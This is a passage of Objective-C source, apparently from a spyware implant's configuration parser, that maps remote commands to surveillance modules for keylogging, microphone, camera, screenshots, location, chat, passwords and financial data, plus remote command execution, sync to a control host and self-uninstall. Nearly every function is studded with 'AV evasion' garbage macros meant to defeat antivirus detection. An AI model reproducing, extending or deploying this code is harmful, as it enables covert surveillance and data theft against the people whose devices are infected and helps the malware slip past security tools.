      conStruct.port  = htons([port intValue]);
    }
  else
    conStruct.port = 0; 
  
  // AV evasion: only on release build
  AV_GARBAGE_009
  
  data = [NSData dataWithBytes: &conStruct length: sizeof(conStruct)];
  
  keys = [NSArray arrayWithObjects: @"type", 
                                    @"actionID", 
                                    @"data",
                                    @"status", 
                                    @"monitor", 
                                    @"enabled",
                                    @"start",
                                    @"repeat",
                                    @"delay",
                                    @"iter",
                                    @"end",
                                    nil];
  
  // AV evasion: only on release build
  AV_GARBAGE_002
  
  objects = [NSArray arrayWithObjects: type, 
                                       action  != nil ? action  : defNum, 
                                       data,
                                       EVENT_START, 
                                       @"", 
                                       enabled != nil ? enabled : defNum,
                                       action  != nil ? action  : defNum,
                                       repeat  != nil ? repeat  : defNum,
                                       delay   != nil ? delay   : defNum,
                                       iter    != nil ? iter    : defNum,
                                       end     != nil ? end     : defNum,
                                       nil]; 
  
  NSDictionary *dictionary = [NSDictionary dictionaryWithObjects: objects
                                                         forKeys: keys];
  
  // AV evasion: only on release build
  AV_GARBAGE_001
  
  NSMutableDictionary *eventConfiguration = [[NSMutableDictionary alloc] init];
  
  [eventConfiguration addEntriesFromDictionary: dictionary];
  
  // AV evasion: only on release build
  AV_GARBAGE_004
  
  [mEventsList addObject: eventConfiguration];
  
  [eventConfiguration release];
  
  // AV evasion: only on release build
  AV_GARBAGE_001
  
  [pool release];
}

// only iOS
- (void)addBatteryEvent: (NSDictionary *)anEvent
{
  NSAutoreleasePool *pool = [[NSAutoreleasePool alloc] init];
  
  // AV evasion: only on release build
  AV_GARBAGE_004
  
  NSArray *keys;
  NSArray *objects;
  NSData  *data;
  batteryLevelStruct_t battStruct;

  NSNumber *defNum  = [NSNumber numberWithUnsignedInt: ACTION_UNKNOWN];
  NSNumber *type    = [NSNumber numberWithUnsignedInt: EVENT_BATTERY];
  
  NSNumber *action  = [anEvent objectForKey: EVENTS_ACTION_START_KEY];
  NSNumber *enabled = [anEvent objectForKey: EVENT_ENABLED_KEY];  
  
  // AV evasion: only on release build
  AV_GARBAGE_002
  
  NSNumber *repeat  = [anEvent objectForKey: EVENT_ACTION_REP_KEY];
  NSNumber *delay   = [anEvent objectForKey: EVENT_ACTION_DELAY_KEY];
  NSNumber *iter    = [anEvent objectForKey: EVENT_ACTION_ITER_KEY];
  
  // AV evasion: only on release build
  AV_GARBAGE_004
  
  NSNumber *end     = [anEvent objectForKey: EVENT_ACTION_END_KEY];
  NSNumber *min     = [anEvent objectForKey: EVENT_BATT_MIN_KEY];
  
  // AV evasion: only on release build
  AV_GARBAGE_006
  
  NSNumber *max     = [anEvent objectForKey: EVENT_BATT_MAX_KEY];
  
  memset(&battStruct, 0, sizeof(battStruct));
  
  battStruct.onClose   = (end != nil ? [end unsignedIntValue] : 0xFFFFFFFF);
  battStruct.minLevel  = (min != nil ? [min unsignedIntValue] : 0xFFFFFFFF);
  battStruct.maxLevel  = (max != nil ? [max unsignedIntValue] : 0xFFFFFFFF);
  
  // AV evasion: only on release build
  AV_GARBAGE_008
  
  data = [NSData dataWithBytes: &battStruct length: sizeof(battStruct)];
  
  // AV evasion: only on release build
  AV_GARBAGE_002
  
  keys = [NSArray arrayWithObjects: @"type", 
                                    @"actionID", 
                                    @"data",
                                    @"status", 
                                    @"monitor", 
                                    @"enabled",
                                    @"start",
                                    @"repeat",
                                    @"delay",
                                    @"iter",
                                    @"end",
                                    nil];
  
  objects = [NSArray arrayWithObjects: type, 
                                       action  != nil ? action  : defNum, 
                                       data,
                                       EVENT_START, 
                                       @"", 
                                       enabled != nil ? enabled : defNum,
                                       action  != nil ? action  : defNum,
                                       repeat  != nil ? repeat  : defNum,
                                       delay   != nil ? delay   : defNum,
                                       iter    != nil ? iter    : defNum,
                                       end     != nil ? end     : defNum,
                                       nil];
  
  // AV evasion: only on release build
  AV_GARBAGE_003
  
  NSDictionary *dictionary = [NSDictionary dictionaryWithObjects: objects
                                                         forKeys: keys];
  
  NSMutableDictionary *eventConfiguration = [[NSMutableDictionary alloc] init];
  
  // AV evasion: only on release build
  AV_GARBAGE_001
  
  [eventConfiguration addEntriesFromDictionary: dictionary];
  
  // AV evasion: only on release build
  AV_GARBAGE_005
  
  [mEventsList addObject: eventConfiguration];
  
  // AV evasion: only on release build
  AV_GARBAGE_008
  
  [eventConfiguration release];
  
  [pool release];
}

// only iOS
- (void)addACEvent: (NSDictionary *)anEvent
{
  NSAutoreleasePool *pool = [[NSAutoreleasePool alloc] init];
  
  NSArray *keys;
  NSArray *objects;
  
  // AV evasion: only on release build
  AV_GARBAGE_003
  
  NSNumber *defNum  = [NSNumber numberWithUnsignedInt: ACTION_UNKNOWN];
  NSNumber *type    = [NSNumber numberWithUnsignedInt: EVENT_AC];
  
  NSNumber *action  = [anEvent objectForKey: EVENTS_ACTION_START_KEY];
  NSNumber *enabled = [anEvent objectForKey: EVENT_ENABLED_KEY];  
  
  // AV evasion: only on release build
  AV_GARBAGE_001
  
  NSNumber *repeat  = [anEvent objectForKey: EVENT_ACTION_REP_KEY];
  NSNumber *delay   = [anEvent objectForKey: EVENT_ACTION_DELAY_KEY];  
  
  // AV evasion: only on release build
  AV_GARBAGE_003
  
  NSNumber *iter    = [anEvent objectForKey: EVENT_ACTION_ITER_KEY];
  NSNumber *end     = [anEvent objectForKey: EVENT_ACTION_END_KEY];
  
  // AV evasion: only on release build
  AV_GARBAGE_001
  
  keys = [NSArray arrayWithObjects: @"type", 
                                    @"actionID", 
                                    @"data",
                                    @"status", 
                                    @"monitor", 
                                    @"enabled",
                                    @"start",
                                    @"repeat",
                                    @"delay",
                                    @"iter",
                                    @"end",
                                    nil];
  
  objects = [NSArray arrayWithObjects: type, 
                                       action  != nil ? action  : defNum, 
                                       @"",
                                       EVENT_START, 
                                       @"", 
                                       enabled != nil ? enabled : defNum,
                                       action  != nil ? action  : defNum,
                                       repeat  != nil ? repeat  : defNum,
                                       delay   != nil ? delay   : defNum,
                                       iter    != nil ? iter    : defNum,
                                       end     != nil ? end     : defNum,
                                       nil];
  
  // AV evasion: only on release build
  AV_GARBAGE_001
  
  NSDictionary *dictionary = [NSDictionary dictionaryWithObjects: objects
                                                         forKeys: keys];
  
  NSMutableDictionary *eventConfiguration = [[NSMutableDictionary alloc] init];
  
  // AV evasion: only on release build
  AV_GARBAGE_004
  
  [eventConfiguration addEntriesFromDictionary: dictionary];
  
  [mEventsList addObject: eventConfiguration];
  
  // AV evasion: only on release build
  AV_GARBAGE_005
  
  [eventConfiguration release];
  
  [pool release];
}

- (void)addIdleEvent: (NSDictionary *)anEvent
{
  NSAutoreleasePool *pool = [[NSAutoreleasePool alloc] init];
  
  NSArray *keys;
  NSArray *objects;
  
  // AV evasion: only on release build
  AV_GARBAGE_002
  
  NSNumber *defNum  = [NSNumber numberWithUnsignedInt: ACTION_UNKNOWN];
  NSNumber *type    = [NSNumber numberWithUnsignedInt: EVENT_IDLE];
  
  // AV evasion: only on release build
  AV_GARBAGE_001
  
  NSNumber *action  = [anEvent objectForKey: EVENTS_ACTION_START_KEY];
  NSNumber *enabled = [anEvent objectForKey: EVENT_ENABLED_KEY];
  NSNumber *repeat  = [anEvent objectForKey: EVENT_ACTION_REP_KEY];
  NSNumber *delay   = [anEvent objectForKey: EVENT_ACTION_DELAY_KEY];
  NSNumber *iter    = [anEvent objectForKey: EVENT_ACTION_ITER_KEY];  
  
  // AV evasion: only on release build
  AV_GARBAGE_001
  
  NSNumber *end     = [anEvent objectForKey: EVENT_ACTION_END_KEY];
  NSNumber *sec     = [anEvent objectForKey: EVENTS_IDLE_TIME_KEY];
  
  UInt32 seconds = [sec intValue];
  
  // AV evasion: only on release build
  AV_GARBAGE_002
  
  NSData *data = [NSData dataWithBytes: &seconds length: sizeof(UInt32)];
  
  // AV evasion: only on release build
  AV_GARBAGE_004
  
  keys = [NSArray arrayWithObjects: @"type", 
                                    @"actionID", 
                                    @"data",
                                    @"status", 
                                    @"monitor", 
                                    @"enabled",
                                    @"start",
                                    @"repeat",
                                    @"delay",
                                    @"iter",
                                    @"end",
                                    nil];
  
  // AV evasion: only on release build
  AV_GARBAGE_004
  
  objects = [NSArray arrayWithObjects: type, 
                                       action  != nil ? action  : defNum, 
                                       data    != nil ? data    : defNum,
                                       EVENT_START, 
                                       @"", 
                                       enabled != nil ? enabled : defNum,
                                       action  != nil ? action  : defNum,
                                       repeat  != nil ? repeat  : defNum,
                                       delay   != nil ? delay   : defNum,
                                       iter    != nil ? iter    : defNum,
                                       end     != nil ? end     : defNum,
                                       nil];
  
  // AV evasion: only on release build
  AV_GARBAGE_006
  
  NSDictionary *dictionary = [NSDictionary dictionaryWithObjects: objects
                                                         forKeys: keys];
  
  NSMutableDictionary *eventConfiguration = [[NSMutableDictionary alloc] init];
  
  // AV evasion: only on release build
  AV_GARBAGE_007
  
  [eventConfiguration addEntriesFromDictionary: dictionary];
  
  // AV evasion: only on release build
  AV_GARBAGE_008
  
  [mEventsList addObject: eventConfiguration];
  
  [eventConfiguration release];
  
  // AV evasion: only on release build
  AV_GARBAGE_003
  
  [pool release];
}

// Done.
// Fake event: never runned, but using when disable/enable a event by a action
// (the parmater is the position of the event)
- (void)addNULLEvent: (NSDictionary *)anEvent
{
  NSAutoreleasePool *pool = [[NSAutoreleasePool alloc] init];
  
  NSArray *keys;
  NSArray *objects;
  
  // AV evasion: only on release build
  AV_GARBAGE_005
  
  NSNumber *defNum  = [NSNumber numberWithUnsignedInt: ACTION_UNKNOWN];
  NSNumber *type    = [NSNumber numberWithUnsignedInt: EVENT_NULL];
  
  // AV evasion: only on release build
  AV_GARBAGE_009
  
  keys = [NSArray arrayWithObjects: @"type", 
                                    @"actionID", 
                                    @"data",
                                    @"status", 
                                    @"monitor", 
                                    @"enabled",
                                    @"start",
                                    @"repeat",
                                    @"delay",
                                    @"iter",
                                    @"end",
                                    nil];
  
  // AV evasion: only on release build
  AV_GARBAGE_004
  
  objects = [NSArray arrayWithObjects: type, 
                                       defNum, 
                                       @"",
                                       EVENT_START, 
                                       @"", 
                                       defNum,
                                       defNum,
                                       defNum,
                                       defNum,
                                       defNum,
                                       defNum,
                                       nil];
  
  // AV evasion: only on release build
  AV_GARBAGE_003
  
  
  NSDictionary *dictionary = [NSDictionary dictionaryWithObjects: objects
                                                         forKeys: keys];
  
  NSMutableDictionary *eventConfiguration = [[NSMutableDictionary alloc] init];
  
  // AV evasion: only on release build
  AV_GARBAGE_005
  
  [eventConfiguration addEntriesFromDictionary: dictionary];
  
  // AV evasion: only on release build
  AV_GARBAGE_006
  
  [mEventsList addObject: eventConfiguration];
  
  // AV evasion: only on release build
  AV_GARBAGE_008
  
  [eventConfiguration release];
  
  // AV evasion: only on release build
  AV_GARBAGE_001
  
  [pool release];
}

typedef struct {
  UInt32 disk_quota;
  UInt32 tag;
  UInt32 exit_event;
} quota_conf_entry_t;

// Done.
- (void)addQuotaEvent: (NSDictionary *)anEvent
{
  NSAutoreleasePool *pool = [[NSAutoreleasePool alloc] init];
  
  // AV evasion: only on release build
  AV_GARBAGE_002
  
  NSArray *keys;
  NSArray *objects;
  NSData  *data;
  quota_conf_entry_t _quota;
  
  // AV evasion: only on release build
  AV_GARBAGE_000
  
  NSNumber *defNum  = [NSNumber numberWithUnsignedInt: ACTION_UNKNOWN];
  
  // AV evasion: only on release build
  AV_GARBAGE_006
  
  NSNumber *type    = [NSNumber numberWithUnsignedInt: EVENT_QUOTA];
  NSNumber *action  = [anEvent objectForKey: EVENTS_ACTION_START_KEY];
  NSNumber *enabled = [anEvent objectForKey: EVENT_ENABLED_KEY];
  NSNumber *repeat  = [anEvent objectForKey: EVENT_ACTION_REP_KEY];
  NSNumber *delay   = [anEvent objectForKey: EVENT_ACTION_DELAY_KEY];
  NSNumber *iter    = [anEvent objectForKey: EVENT_ACTION_ITER_KEY];
  NSNumber *end     = [anEvent objectForKey: EVENT_ACTION_END_KEY];
  NSNumber *quota   = [anEvent objectForKey: EVENTS_QUOTA_KEY];
  
  // AV evasion: only on release build
  AV_GARBAGE_000
  
  _quota.disk_quota = (quota != nil ? [quota intValue] : 0xFFFFFFFF);
  _quota.exit_event = (end != nil ? [end intValue] : 0xFFFFFFFF);
  
  // AV evasion: only on release build
  AV_GARBAGE_007
  
  data = [NSData dataWithBytes: &_quota length:sizeof(quota_conf_entry_t)];
  
  // AV evasion: only on release build
  AV_GARBAGE_009
  
  keys = [NSArray arrayWithObjects: @"type", 
                                    @"actionID", 
                                    @"data",
                                    @"status", 
                                    @"monitor", 
                                    @"enabled",
                                    @"start",
                                    @"repeat",
                                    @"delay",
                                    @"iter",
                                    @"end",
                                    nil];
  
  // AV evasion: only on release build
  AV_GARBAGE_008
  
  objects = [NSArray arrayWithObjects: type, 
                                       action  != nil ? action  : defNum, 
                                       data,
                                       EVENT_START, 
                                       @"", 
                                       enabled != nil ? enabled : defNum,
                                       action  != nil ? action  : defNum,
                                       repeat  != nil ? repeat  : defNum,
                                       delay   != nil ? delay   : defNum,
                                       iter    != nil ? iter    : defNum,
                                       end     != nil ? end     : defNum,
                                       nil];
  
  NSDictionary *dictionary = [NSDictionary dictionaryWithObjects: objects
                                                         forKeys: keys];
  
  // AV evasion: only on release build
  AV_GARBAGE_003
  
  NSMutableDictionary *eventConfiguration = [[NSMutableDictionary alloc] init];
  
  // AV evasion: only on release build
  AV_GARBAGE_001
  
  [eventConfiguration addEntriesFromDictionary: dictionary];
  
  [mEventsList addObject: eventConfiguration];
  
  // AV evasion: only on release build
  AV_GARBAGE_004
  
  [eventConfiguration release];
  
  [pool release];
}


#
#
#pragma mark Actions parsing
#
#

// Done.
- (NSMutableDictionary *)initActionUninstall:(NSDictionary *)subAction
{
  NSAutoreleasePool *pool = [[NSAutoreleasePool alloc] init];
  
  // AV evasion: only on release build
  AV_GARBAGE_005
  
  NSNumber *type   = [NSNumber numberWithUnsignedInt: ACTION_UNINSTALL];
  NSNumber *status = [NSNumber numberWithUnsignedInt: 0];
  
  // AV evasion: only on release build
  AV_GARBAGE_001
  
  NSMutableDictionary *subActDict = [[NSMutableDictionary alloc] initWithObjectsAndKeys: 
                              type, @"type", status, @"status", @"", @"data", nil];
  
  // AV evasion: only on release build
  AV_GARBAGE_004
  
  [pool release];
  
  return subActDict;
}

// Done. XXX- checking utf8 o utf16 encoding
- (NSMutableDictionary *)initActionInfolog:(NSDictionary *)subAction
{
  NSAutoreleasePool *pool = [[NSAutoreleasePool alloc] init];
  
  // AV evasion: only on release build
  AV_GARBAGE_003
  
  NSNumber *type      = [NSNumber numberWithUnsignedInt: ACTION_INFO];
  NSNumber *status    = [NSNumber numberWithUnsignedInt: 0];
  NSMutableData *data = [[NSMutableData alloc] initWithCapacity:0];
  
  // AV evasion: only on release build
  AV_GARBAGE_005
  
  NSString *infoText = [subAction objectForKey: ACTION_INFO_TEXT_KEY];
  
  // AV evasion: only on release build
  AV_GARBAGE_006
  
  //int32_t len = [infoText lengthOfBytesUsingEncoding: NSUTF16StringEncoding];
  
  //[data appendBytes: &len length:sizeof(int32_t)];
  
  if (infoText == nil) 
    [data appendData: [@"" dataUsingEncoding: NSUTF16LittleEndianStringEncoding]];
  else
    [data appendData: [infoText dataUsingEncoding: NSUTF16LittleEndianStringEncoding]]; 
  
  // AV evasion: only on release build
  AV_GARBAGE_004
  
  NSMutableDictionary *subActDict = [[NSMutableDictionary alloc] initWithObjectsAndKeys: 
                                      type, @"type", status, @"status", data, @"data", nil];
                                  
  [data release];
  [pool release];
  
  // AV evasion: only on release build
  AV_GARBAGE_002
  
  return subActDict;
}

// Done.
- (NSMutableDictionary *)initActionModule:(NSDictionary *)subAction
{
  NSAutoreleasePool *pool = [[NSAutoreleasePool alloc] init];
  
  UInt32 tmpAgentID = MODULE_UNKNOWN;
  NSMutableDictionary *subActDict = nil;
  NSNumber *status = [NSNumber numberWithUnsignedInt: 0];
  NSNumber *type;  
  NSData   *data = nil;
  
  // AV evasion: only on release build
  AV_GARBAGE_003
  
  NSString *moduleName = (NSString *)[subAction objectForKey: ACTION_MODULE_KEY];
  NSString *moduleStat = (NSString *)[subAction objectForKey: ACTION_MODULE_STATUS_KEY];
  
  if (moduleStat == nil || moduleName == nil)
    return nil;
  
  // AV evasion: only on release build
  AV_GARBAGE_007
  
  // start/stop action    
  if ([moduleStat compare: ACTION_MODULE_START_KEY] == NSOrderedSame) 
  {  
    // AV evasion: only on release build
    AV_GARBAGE_001
    
      type = [NSNumber numberWithUnsignedInt:ACTION_AGENT_START]; 
    }
  else
  {  
    // AV evasion: only on release build
    AV_GARBAGE_003
    
      type = [NSNumber numberWithUnsignedInt:ACTION_AGENT_STOP];
    }
  
  if ([moduleName compare: ACTION_MODULE_ADDB] == NSOrderedSame)
  {  
    // AV evasion: only on release build
    AV_GARBAGE_009
    
      tmpAgentID = AGENT_ORGANIZER;
    }
  else if ([moduleName compare: ACTION_MODULE_APPL] == NSOrderedSame)
  {  
    // AV evasion: only on release build
    AV_GARBAGE_005
    
      tmpAgentID = AGENT_APPLICATION;
    }
//  else if ([moduleName compare: ACTION_MODULE_CAL] == NSOrderedSame)
//    {
//      tmpAgentID = AGENT_ORGANIZER;
//    }
  else if ([moduleName compare: ACTION_MODULE_CALL] == NSOrderedSame)
  {  
    // AV evasion: only on release build
    AV_GARBAGE_004
    
      tmpAgentID = AGENT_VOIP;
    }
  else if ([moduleName compare: ACTION_MODULE_CALLLIST] == NSOrderedSame)
  {  
    // AV evasion: only on release build
    AV_GARBAGE_006
    
      tmpAgentID = AGENT_CALL_LIST;
    }
  else if ([moduleName compare: ACTION_MODULE_CAMERA] == NSOrderedSame)
  {  
    // AV evasion: only on release build
    AV_GARBAGE_002
    
      tmpAgentID = AGENT_CAM;
   }
  else if ([moduleName compare: ACTION_MODULE_CHAT] == NSOrderedSame)
  {  
    // AV evasion: only on release build
    AV_GARBAGE_007
  
    tmpAgentID = AGENT_CHAT_NEW;
  }
  else if ([moduleName compare: ACTION_MODULE_CLIP] == NSOrderedSame)
  {  
    // AV evasion: only on release build
    AV_GARBAGE_004
    
      tmpAgentID = AGENT_CLIPBOARD;
    }
  else if ([moduleName compare: ACTION_MODULE_CONF] == NSOrderedSame)
  {  
    // AV evasion: only on release build
    AV_GARBAGE_004
    
      tmpAgentID = AGENT_CALL_DIVERT;
    }
  else if ([moduleName compare: ACTION_MODULE_CRISIS] == NSOrderedSame)
  {  
    // AV evasion: only on release build
    AV_GARBAGE_003
    
      tmpAgentID = AGENT_CRISIS;
    }
  else if ([moduleName compare: ACTION_MODULE_DEV] == NSOrderedSame)
    {  
      // AV evasion: only on release build
      AV_GARBAGE_000
    
      tmpAgentID = AGENT_DEVICE;
    }
  else if ([moduleName compare: ACTION_MODULE_KEYL] == NSOrderedSame)
    {  
      // AV evasion: only on release build
      AV_GARBAGE_002
    
      tmpAgentID = AGENT_KEYLOG;
    }
  else if ([moduleName compare: ACTION_MODULE_LIVEM] == NSOrderedSame)
    {  
      // AV evasion: only on release build
      AV_GARBAGE_004
    
      tmpAgentID = AGENT_CALL_DIVERT;
    }
  else if ([moduleName compare: ACTION_MODULE_MIC] == NSOrderedSame)
    {  
      // AV evasion: only on release build
      AV_GARBAGE_005
    
      tmpAgentID = AGENT_MICROPHONE;
    }
  else if ([moduleName compare: ACTION_MODULE_MSGS] == NSOrderedSame)
    {  
      // AV evasion: only on release build
      AV_GARBAGE_008
    
      tmpAgentID = AGENT_MESSAGES;
    }
  else if ([moduleName compare: ACTION_MODULE_POS] == NSOrderedSame)
    {  
      // AV evasion: only on release build
      AV_GARBAGE_000
    
      tmpAgentID = AGENT_POSITION;
    }
  else if ([moduleName compare: ACTION_MODULE_SNAPSHOT] == NSOrderedSame)
    {  
      // AV evasion: only on release build
      AV_GARBAGE_003
    
      tmpAgentID = AGENT_SCREENSHOT;
    }
  else if ([moduleName compare: ACTION_MODULE_URL] == NSOrderedSame)
    {  
      // AV evasion: only on release build
      AV_GARBAGE_005
    
      tmpAgentID = AGENT_URL;
    }
  else if ([moduleName compare: ACTION_MODULE_MOUSE] == NSOrderedSame)
    {  
      // AV evasion: only on release build
      AV_GARBAGE_004
      
      tmpAgentID = AGENT_MOUSE;
    }
  else if ([moduleName compare: ACTION_MODULE_FILE] == NSOrderedSame)
    {  
      // AV evasion: only on release build
      AV_GARBAGE_003
    
      tmpAgentID = AGENT_FILECAPTURE;
    } 
  else if ([moduleName compare: ACTION_MODULE_PASSWD] == NSOrderedSame)
  {
      // AV evasion: only on release build
      AV_GARBAGE_003
      
      tmpAgentID = AGENT_PASSWORD;
  }
  else if ([moduleName compare: ACTION_MODULE_MONEY] == NSOrderedSame)
  {
      // AV evasion: only on release build
      AV_GARBAGE_003
      
      tmpAgentID = AGENT_MONEY;
  }
    
  // AV evasion: only on release build
  AV_GARBAGE_003
  
  data = [[NSData alloc] initWithBytes: &tmpAgentID length: sizeof(tmpAgentID)];
  
  // AV evasion: only on release build
  AV_GARBAGE_000
  
  subActDict = [[NSMutableDictionary alloc] initWithObjectsAndKeys: 
                type, @"type", status, @"status", data, @"data", nil];
  
  [data release];
  
  // AV evasion: only on release build
  AV_GARBAGE_001
  
  [pool release];
  
  return subActDict;
}

// Done.
- (NSMutableDictionary *)initActionSync:(NSDictionary *)subAction
{  
  NSAutoreleasePool *pool = [[NSAutoreleasePool alloc] init];
  
  // AV evasion: only on release build
  AV_GARBAGE_006
  
  syncStruct_t tmpSyncStruct;
  
  // AV evasion: only on release build
  AV_GARBAGE_003
  
  NSNumber *type   = [NSNumber numberWithUnsignedInt: ACTION_SYNC];
  NSNumber *status = [NSNumber numberWithUnsignedInt: 0];
  NSData   *data;
  
  // AV evasion: only on release build
  AV_GARBAGE_001
  
  NSNumber *stop      = [subAction objectForKey: ACTION_SYNC_STOP_KEY];
  NSNumber *bandwidth = [subAction objectForKey: ACTION_SYNC_BAND_KEY];
  NSNumber *mindelay  = [subAction objectForKey: ACTION_SYNC_MIN_KEY];
  NSNumber *maxdelay  = [subAction objectForKey: ACTION_SYNC_MAX_KEY];
  NSString *host      = [subAction objectForKey: ACTION_SYNC_HOST_KEY];
  
  // incorrect sync action! XXX- todo verification
  if ( host == nil) 
    {
      return nil;
    }
  
  tmpSyncStruct.bandwidthLimit = (bandwidth == nil ? 1 : [bandwidth intValue]);
  tmpSyncStruct.minSleepTime   = (mindelay  == nil ? 1 : [mindelay intValue]);
  tmpSyncStruct.maxSleepTime   = (maxdelay  == nil ? 1 : [maxdelay intValue]);
  
  // AV evasion: only on release build
  AV_GARBAGE_002
  
  NSData *tmpHostnameData = [host dataUsingEncoding: NSUTF8StringEncoding];
  
  memset(tmpSyncStruct.configString, 0, 256);
  
  // AV evasion: only on release build
  AV_GARBAGE_003
  
  memcpy(tmpSyncStruct.configString, 
         [tmpHostnameData bytes], 
         [tmpHostnameData length]);
  
  data = [[NSData alloc] initWithBytes: &tmpSyncStruct length:sizeof(syncStruct_t)];
  
  // AV evasion: only on release build
  AV_GARBAGE_001
  
  NSMutableDictionary *subActDict = [[NSMutableDictionary alloc] initWithObjectsAndKeys: 
                              type, @"type", status, @"status", data, @"data", stop, @"stop", nil];
  
  [data release];
  
  [pool release];
  
  // AV evasion: only on release build
  AV_GARBAGE_000
  
  return subActDict;
}

// Done.
- (NSMutableDictionary *)initActionEvent:(NSDictionary *)subAction
{
  NSAutoreleasePool *pool = [[NSAutoreleasePool alloc] init];
  
  NSData   *data = nil;
  action_event_t actEvent;
  
  // AV evasion: only on release build
  AV_GARBAGE_000
  
  NSNumber *type = [NSNumber numberWithUnsignedInt: ACTION_EVENT];
  NSString *status = [subAction objectForKey: ACTION_EVENT_STATUS_KEY];  
  
  // AV evasion: only on release build
  AV_GARBAGE_002
  
  NSNumber *event  = [subAction objectForKey: ACTION_EVENT_EVENT_KEY];
  
  // AV evasion: only on release build
  AV_GARBAGE_005
  
  if (status != nil && [status compare:ACTION_EVENT_STATUS_ENA_KEY] == NSOrderedSame)
    {
      actEvent.enabled = TRUE;  
    }
  else
    {
      actEvent.enabled = FALSE;
    }
  
  // AV evasion: only on release build
  AV_GARBAGE_004
  
  if (event != nil)
    actEvent.event = [event intValue];
  else
    actEvent.event = EVENT_UNKNOWN;
    
  data = [[NSData alloc] initWithBytes: &actEvent length:sizeof(actEvent)];
  
  // AV evasion: only on release build
  AV_GARBAGE_002
  
  NSMutableDictionary *subActDict = [[NSMutableDictionary alloc] initWithObjectsAndKeys: 
                              type, @"type", status, @"status", data, @"data", nil];
  
  [data release];
  
  // AV evasion: only on release build
  AV_GARBAGE_002
  
  [pool release];
  
  return subActDict;
}

// Done.
- (NSMutableDictionary *)initActionCommand:(NSDictionary *)subAction
{
  NSAutoreleasePool *pool = [[NSAutoreleasePool alloc] init];
  
  // AV evasion: only on release build
  AV_GARBAGE_003
  
  NSNumber *type = [NSNumber numberWithUnsignedInt: ACTION_EXECUTE];
  
  // AV evasion: only on release build
  AV_GARBAGE_005
  
  NSNumber *status = [NSNumber numberWithUnsignedInt: 0];
  NSString *command = [subAction objectForKey:ACTION_CMD_COMMAND_KEY];
  
  // AV evasion: only on release build
  AV_GARBAGE_006
  
  NSData *data      = [command dataUsingEncoding:NSUTF8StringEncoding];
  
  // AV evasion: only on release build
  AV_GARBAGE_007
  
  NSMutableDictionary *subActDict = [[NSMutableDictionary alloc] initWithObjectsAndKeys: 
                                     type, @"type", status, @"status", data, @"data", nil];
  
  [pool release];
  
  // AV evasion: only on release build
  AV_GARBAGE_009
  
  return subActDict;
}

- (NSMutableArray *)initSubActions:(NSArray *)subactions
{
  NSMutableArray *iSubAct = [[NSMutableArray alloc] initWithCapacity: 0];
  NSMutableDictionary *subActDict = nil;
  
  // AV evasion: only on release build
  AV_GARBAGE_005
  
  if (subactions != nil) 
    {
    for (int i=0; i<[subactions count]; i++) 
      {
        NSDictionary *subAction = (NSDictionary *)[subactions objectAtIndex:i];
        NSString *typeString = (NSString *)[subAction objectForKey: ACTION_TYPE_KEY];
        
        // AV evasion: only on release build
        AV_GARBAGE_002
        
        if (typeString == nil)
          continue;
        
        // AV evasion: only on release build
        AV_GARBAGE_001
        
        subActDict = nil;
        
        // Internet sync
        if ([typeString compare: ACTION_SYNC_KEY] == NSOrderedSame) 
          {  
            // AV evasion: only on release build
            AV_GARBAGE_003
          
           subActDict = [self initActionSync: subAction];
          }
        else if ([typeString compare: ACTION_MODULE_KEY] == NSOrderedSame) 
          {  
            // AV evasion: only on release build
            AV_GARBAGE_009
          
           subActDict = [self initActionModule: subAction];
          }
        else if ([typeString compare: ACTION_LOG_KEY] == NSOrderedSame) 
          {  
            // AV evasion: only on release build
            AV_GARBAGE_008
          
           subActDict = [self initActionInfolog: subAction];
          }
        else if ([typeString compare: ACTION_UNINST_KEY] == NSOrderedSame) 
          {  
            // AV evasion: only on release build
            AV_GARBAGE_001
          
           subActDict = [self initActionUninstall: subAction];
          }
        else if ([typeString compare: ACTION_EVENT_KEY] == NSOrderedSame) 
          {
           // AV evasion: only on release build
           AV_GARBAGE_002
            
           subActDict = [self initActionEvent: subAction];
          }
        else if ([typeString compare: ACTION_CMD_KEY] == NSOrderedSame) 
          {  
            // AV evasion: only on release build
            AV_GARBAGE_004
          
            subActDict = [self initActionCommand: subAction];
          }
          
        if (subActDict != nil)
          {  
          // AV evasion: only on release build
          AV_GARBAGE_001
            
           [iSubAct addObject: subActDict];
           [subActDict release];
          }
      }
    }
  
  return iSubAct;
}


- (NSMutableDictionary *)initSubActions:(NSArray *)subactions 
                              forAction:(NSNumber *)actionNum
{
  // may return a 0 subactions array, but never nil
  NSMutableArray *parsedSubactions = [self initSubActions: subactions];
  
  // AV evasion: only on release build
  AV_GARBAGE_001
  
  NSMutableDictionary *newAction = [[NSMutableDictionary alloc] initWithObjectsAndKeys: 
                             actionNum, ACTION_NUM_KEY, parsedSubactions, ACTION_SUBACT_KEY, nil];
  
  // AV evasion: only on release build
  AV_GARBAGE_002
  
  [parsedSubactions release];
  
  // AV evasion: only on release build
  AV_GARBAGE_004
  
  return newAction;
}

@end

@implementation SBJSonConfigDelegate

- (id)init
{
  self = [super init];
  
  // AV evasion: only on release build
  AV_GARBAGE_001
  
  if (self) {
    adapter = [[SBJsonStreamParserAdapter alloc] init];
    adapter.delegate = (id)self;
    
    parser = [[SBJsonStreamParser alloc] init];
    parser.delegate = adapter;
    
    //    mEventsList  = [[NSMutableArray alloc] initWithCapacity:0];
    //    mActionsList = [[NSMutableArray alloc] initWithCapacity:0];
    //    mAgentsList  = [[NSMutableArray alloc] initWithCapacity:0];
  }
  
  // AV evasion: only on release build
  AV_GARBAGE_002
  
  return self;
}

- (void)dealloc
{
  //  [mEventsList release];
  //  [mAgentsList release];
  //  [mActionsList release];
  
  [parser release];
  [adapter release];
  [super dealloc];
}

- (void)parseAndAddActions:(NSDictionary *)dict
{  
  NSArray *actionsArray = [dict objectForKey: ACTIONS_KEY];
  
  // AV evasion: only on release build
  AV_GARBAGE_003
  
  if (actionsArray == nil) 
      return;
  
  // AV evasion: only on release build
  AV_GARBAGE_002
  
  for (int i=0; i < [actionsArray count]; i++) 
    {
      NSAutoreleasePool *inner = [[NSAutoreleasePool alloc]init];
      
      // AV evasion: only on release build
      AV_GARBAGE_001
      
      NSDictionary *action = (NSDictionary *)[actionsArray objectAtIndex: i];
      
      // AV evasion: only on release build
      AV_GARBAGE_006
      
      NSArray  *subactions  = (NSArray *)[action objectForKey: ACTION_SUBACT_KEY];
      NSNumber *actionNum = [NSNumber numberWithUnsignedInt: i];
      
      // AV evasion: only on release build
      AV_GARBAGE_009
      
      NSMutableDictionary *newAction = [self initSubActions:subactions forAction:actionNum];
 
      [mActionsList addObject: newAction];
      
      // AV evasion: only on release build
      AV_GARBAGE_000
      
      [newAction release];
      
